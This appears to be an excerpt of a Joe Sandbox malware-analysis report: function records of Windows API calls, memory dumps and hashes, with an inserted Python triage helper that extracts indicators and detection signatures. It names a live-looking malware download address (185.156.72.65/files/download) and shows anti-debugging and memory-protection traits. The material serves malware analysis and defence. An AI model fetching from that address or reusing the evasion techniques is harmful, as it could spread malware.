                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                    • GetLastError.KERNEL32 ref: 00419A6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                    • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                    • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                    • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                    APIs
                    • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04969996
                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04969BE8
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04969C2E
                    • GetLastError.KERNEL32 ref: 04969CD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                    • Instruction ID: 090ace3839b3da5c97d2318d0a6ade9401a9e7bae4a9c71c157b85b3dba30f2d
                    • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                    • Instruction Fuzzy Hash: F3D16BB5E002489FCF15CFE8D8809ADBBF9FF49314F28456AE45AEB351D630A946CB50
                    APIs
                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileInternet$PointerRead
                    • String ID:
                    • API String ID: 3197321146-0
                    • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                    • Instruction ID: eb7b93129c0bd39a399fa667d664963be0dca8c4f381e32a02064f17c29549db
                    • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                    • Instruction Fuzzy Hash: E2C14B70900218DFEB24DF64CC85BE9B7B9EF49304F2041E9E909A72A0D775BA84CF95
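The listings above carry the three facts a triage analyst wants from this report: a network indicator embedded as a String ID (185.156.72.65/files/download), WinINet download and VirtualProtect/OutputDebugStringA/GetLastError functions living in the dump at 04950000 that is not backed by a PE, and CRT functions whose Opcode ID is identical in the 00400000 image and in the 04950000 region while the Instruction ID differs. The following helper is an added example, not Joe Sandbox code: it parses records in this listing format and pulls those facts out. The signature names, the IOC pattern and the reading of "same Opcode ID, PE-backed and not" as code relocated out of the image are this example's own choices; SAMPLE is excerpted from the records on this page with the lines the parser ignores left out.

```python
"""Triage helper for Joe Sandbox function listings in the format shown above.
Added example, not Joe Sandbox code. The signature table and IOC pattern are this
example's own choices; SAMPLE is excerpted from the listings on this page."""
import re
from dataclasses import dataclass, field

@dataclass
class Record:                       # one function record from the listing
    apis: set = field(default_factory=set)
    offset: int = 0                 # base of the memory dump the function was found in
    pe_backed: bool = False         # "based on PE: true" = inside the mapped image
    strings: list = field(default_factory=list)
    opcode_id: str = ""             # hashes opcodes only, so it survives relocation

def api_name(body):
    """'FreeLibrary.KERNEL32(...), ref: 0041343A' -> 'FreeLibrary'; None if not an API line."""
    body = re.sub(r"^Part of subcall function [0-9A-Fa-f]+:\s*", "", body)
    if " ref: " not in body:
        return None
    call = body.rsplit(" ref: ", 1)[0].rstrip(",")
    return call.split("(", 1)[0].rpartition(".")[0]   # drop args first: they may contain '.'

def parse_records(text):
    recs, cur, section = [], Record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings", "Memory Dump Source", "Yara matches", "Similarity"):
            section = line
            continue
        body = line.lstrip("•").strip()
        if body.startswith("Source File:"):
            m = re.search(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)", body)
            cur.offset, cur.pe_backed = int(m.group(1), 16), m.group(2) == "true"
        elif body.startswith("String ID:"):
            cur.strings = [s for s in body.split(":", 1)[1].strip().split("$") if s]
        elif body.startswith("Opcode ID:"):
            cur.opcode_id = body.split(":", 1)[1].strip()
        elif body.startswith("Instruction Fuzzy Hash:"):   # last line of every record
            recs.append(cur)
            cur = Record()
        elif section == "APIs":
            name = api_name(body)
            if name:
                cur.apis.add(name)
    return recs

IOC_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b(?:/[\w./-]*)?")   # IPv4 with optional path
SIGNATURES = {                      # every listed API must occur in the same function
    "wininet-download": {"InternetReadFile"},
    "memory-protection-change": {"VirtualProtect"},
    "outputdebugstring-getlasterror-debugger-check": {"OutputDebugStringA", "GetLastError"},
}

def triage(text):
    recs = parse_records(text)
    iocs = sorted({ioc for r in recs for s in r.strings for ioc in IOC_RE.findall(s)})
    hits = sorted((sig, r.offset, r.pe_backed) for r in recs
                  for sig, needed in SIGNATURES.items() if needed <= r.apis)
    dumps = {}                      # opcode id -> set of pe_backed flags it was dumped with
    for r in recs:
        if r.opcode_id:
            dumps.setdefault(r.opcode_id, set()).add(r.pe_backed)
    # same opcodes in the image and in an unbacked region: the code was copied out of the PE
    relocated = sorted(op for op, flags in dumps.items() if flags == {True, False})
    return {"records": len(recs), "iocs": iocs, "signatures": hits, "relocated": relocated}

SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
• Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
• Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
APIs
• GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
• Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
• Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
• Instruction Fuzzy Hash: 1901B5322097119EB735ABBCFCC5A5B2A68EB4167C3704239ED24950F1EF5178055348
APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
• GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
• OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
• Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
• Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
• Instruction Fuzzy Hash: 9131E532B00104AFEB14DF58DC40FAAB7B8EF48700F6541F9ED059B2A2DB31A916CB94
APIs
  • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
• __Init_thread_footer.LIBCMT ref: 004013BB
• Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• String ID: 185.156.72.65/files/download$BAOJ$JAY@
• Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
• Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
APIs
• InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
• InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
• Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
• Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
• Instruction Fuzzy Hash: E2C14B70900218DFEB24DF64CC85BE9B7B9EF49304F2041E9E909A72A0D775BA84CF95
"""
```

Running triage(SAMPLE) (or triage() over the full listing pasted into a file) yields the download URL as the only network IOC, all three signature hits at 04950000 with pe_backed False, and the shared Opcode ID d6c575… as relocated code. The record terminator is the Instruction Fuzzy Hash line because it closes every record in this format, including the ones with an empty APIs section; the three-API signature is a heuristic and should be read alongside the behaviour signatures at the top of the report rather than as proof on its own.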
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                    • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction ID: 5cc4e608ba870c86061b251413a45c7d5df544701d674f89a2be05a2e5113e03
                    • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction Fuzzy Hash: AE51A2B2601606AFEB29DF14D889BBA77A9EF40314F38453DDE054B6B0E731B954CB90
                    APIs
                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                    • GetLastError.KERNEL32 ref: 00417548
                    • __dosmaperr.LIBCMT ref: 0041754F
                    • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                    • __dosmaperr.LIBCMT ref: 00417590
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                    • String ID:
                    • API String ID: 1913693674-0
                    • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                    • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                    APIs
                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                    • GetLastError.KERNEL32 ref: 049677AF
                    • __dosmaperr.LIBCMT ref: 049677B6
                    • GetLastError.KERNEL32(?,?,?,?), ref: 049677F0
                    • __dosmaperr.LIBCMT ref: 049677F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                    • String ID:
                    • API String ID: 1913693674-0
                    • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction ID: 89fbce9ef6911b3f7a181470303265efeba8fc05d8566701dc68da8c1070cfd8
                    • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction Fuzzy Hash: 1E216271600605AFEB11EFA598C0C6BB7ADFF842AC7108579E91B97250E735FC50CBA0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                    • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction ID: df6395ff5d616979d49be4c64c05c387649a92e6d41db2ca51b23fd16f764d07
                    • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction Fuzzy Hash: E6218E71204205AFAB20EF659C8197AB7AEEF842A87108935F91BDB160E730FC4087A0
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                    • String ID:
                    • API String ID: 158306478-0
                    • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                    • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,049636EF,0495381E,?,00000000,04952AA0,04952AA2,?,04963868,00000022,00420B0C,00422950,00422958,04952AA0), ref: 049636A1
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction ID: 067c916b0eb0639cacaf8424bae5b75bf55862140bc37f4bcbf575502e0cae7c
                    • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction Fuzzy Hash: 6B21D231B01610BBCB319F65EC42B9A3B6D9B427A4B254235ED07A73A1EB30FD05C6D4
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 049686F4
                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496872C
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496874C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                    • String ID:
                    • API String ID: 158306478-0
                    • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction ID: feb1a02ec53880696c5514432aa90a6bf02a22c72f3534a569fecb4c0ca89810
                    • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction Fuzzy Hash: 0611C4B66125197E77217B765CC8CAF3DADCEC91A87010534F90792100FA60FE0282B6
                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                    • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                      • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                    • ___initconout.LIBCMT ref: 0041CC5B
                      • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                    • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000), ref: 0496CEA6
                    • GetLastError.KERNEL32(?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000,?,0496A2C8,?), ref: 0496CEB2
                      • Part of subcall function 0496CE78: CloseHandle.KERNEL32(0042CA30,0496CEC2,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000), ref: 0496CE88
                    • ___initconout.LIBCMT ref: 0496CEC2
                      • Part of subcall function 0496CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0496CE69,0496CAF3,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CE4D
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CED7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction ID: 525149c5109c89400660402c7a5a91214a4283679d32bd0e85d18a4c906a30fe
                    • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction Fuzzy Hash: 18F0AC36540158BBCF225F95EC08A9A7F36FF496A1B458030FA5A96120D732AC219BD4
                    APIs
                    • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                    • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                    • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                    • String ID:
                    • API String ID: 3269011525-0
                    • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                    • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                    • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                    • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                    • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                    • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                    • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                    APIs
                    • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                    • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                    • String ID: vector too long
                    • API String ID: 3646673767-2873823879
                    • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                    • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                    • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                    • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                    APIs
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0495BAA6
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0495BB5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 3480331319-1018135373
                    • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction ID: 0e7c3944bde18a15751221af0c1f39edf172653e307827899b3639b505ec047c
                    • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction Fuzzy Hash: 6C41A134E00219AFDF10DF68C884AAEBBF5AF45328F248175EC14AB365D771BA05CB91
                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                    • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                    APIs
                    • RtlEncodePointer.NTDLL(00000000), ref: 0495C32C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction ID: 469ca81cc88efd7d276d9fe38d2634b47bf2dc2cc48431cd51c1df6cbec78555
                    • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction Fuzzy Hash: BD412872900209AFDF16DF98C981EEEBBB9BF48304F248169FD15A7225D335A950DF50
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00401084
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
